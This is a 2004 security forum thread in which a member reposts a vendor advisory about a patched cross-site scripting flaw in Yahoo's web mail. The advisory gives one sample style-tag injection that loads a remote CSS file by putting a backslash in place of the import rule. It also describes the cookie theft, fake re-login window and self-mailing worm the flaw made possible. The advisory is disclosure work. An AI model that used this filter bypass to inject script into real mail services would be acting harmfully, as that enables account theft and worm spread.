Results 1 to 3 of 3

Thread: Yahoo! E-mail Service Vulnerability..

  1. #1
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400

    Yahoo! E-mail Service Vulnerability..

    Is it just me or did Yahoo get very very lucky they were informed?the vulnerability sounds...interesting..*sigh* Yahoo's active content filter not doing it's job it seems
    Here's the article:
    http://www.astalavista.com/?section=dir&act=dnd&id=2575

  2. #2
    AO French Antique News Whore
    Join Date
    Aug 2001
    Posts
    2,126
    Cannot find server error message here!
    -Simon \"SDK\"

  3. #3
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    http://www.astalavista.com//data/yahoovulnerability.txt
    Here's it anyways:
    Yahoo! E-mail Service Vulnerability



    Release Date:

    August 23, 2004



    Severity:

    Critical (Potential web-based e-mail worm)



    Systems Affected:

    Other web-based e-mail systems may be vulnerable.

    Internet Explorer and any software application used for reading Yahoo

    e-mail messages.

    (The ActiveX payload is relevant only for Internet Explorer)



    Finjan Software notification sent to Yahoo! on May 24, 2004.



    Status:

    Yahoo! has already patched their Web-based e-mail services

    on July 16, 2004.

    Other web-based e-mail systems may be vulnerable.





    Description:

    Finjan Software identified a new critical cross site scripting vulnerability in Yahoo’s Web-based e-mail service.

    This vulnerability allowed hackers to develop an attack that could have caused significant computer damage during regular Internet use.





    This vulnerability resulted from the failure of Yahoo’s active content filter to adequately block ActiveX controls and other active content components, and affected all Windows based system platforms that read e-mail messages using Yahoo Web-mail service. Active X controls are downloadable programs that run with the same rights and privileges as the user, allowing access to files and personal information stored on a local hard drive or shared folder. A no-click attack could have launched automatically once a user opened an e-mail message.

    For example, the vulnerability could have also potentially allowed a worm to read Windows address book, replicate and send itself to everyone in the address book, and have this process repeat at an exponential rate. It could have also harvested email addresses from local files, just like any other worm, and use the Yahoo web-mail vulnerability to send the email messages. Other web-based e-mail systems may be vulnerable to this vulnerability.







    Technical details:

    The potential worm could do anything that the user could do.

    It is a potentially automatic attack.

    Users had to simply read the infected email message.

    This was a cross-site scripting vulnerability of the Yahoo! Web-based e-mail service.

    There are two variants of this vulnerability.

    The purpose of Yahoo's active content filter is to block the injection of any active content into Yahoo! messages.

    However, the basic failure that allowed this vulnerability is that there was no blocking of a backslash that is used instead of the import rule.



    An example:

    <style><!--@\ "http://www.finjan.com/mcrc/file.css";--></style>



    The injected JavaScript code inside the CSS file is responsible for:



    -Getting cookies.

    -Automatic launching of malicious code.

    -A possible identity theft using a spoofed re-login window.

    -Sending an e-mail message.

    The injected ActiveX control can be used for a destructive payload of the propagating worm.

    The basic attack does not require an ActiveX control.

    The ActiveX control is the payload that can be used to extend the attack to non-web mail users, or to perform any malicious activity, including formatting of the hard disk.

    Upon using the ActiveX control, end user may get a security warning.

    It depends on the security setting of the browser.



    An example:

    http://www.finjan.com/SecurityLab/Se...er/activex.asp

    (Click on the 'test me' button after reading the disclaimer)



    Credit:

    Bitlance Winter provided the initial tip.

    Finjan Software's Malicious Code Research Center (MCRC) has expanded it.



    Protection:

    This specific vulnerability has been eliminated by Yahoo based on Finjan Software notification.

    Finjan's content security products provided proactive defense against this Yahoo! vulnerability prior to its detection and correction.

    Finjan's patented behavior blocking engine will protect computer users from similar future vulnerabilities and comparable potential exploits.







    Credit: Bitlance Winter , Dror Shalev and Menashe Eliezer.





    Finjan Software

    Malicious Code Research Center (MCRC) department

    http://www.finjan.com/mcrc

    Prevention is the best cure!

    sowwies SDK lol

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •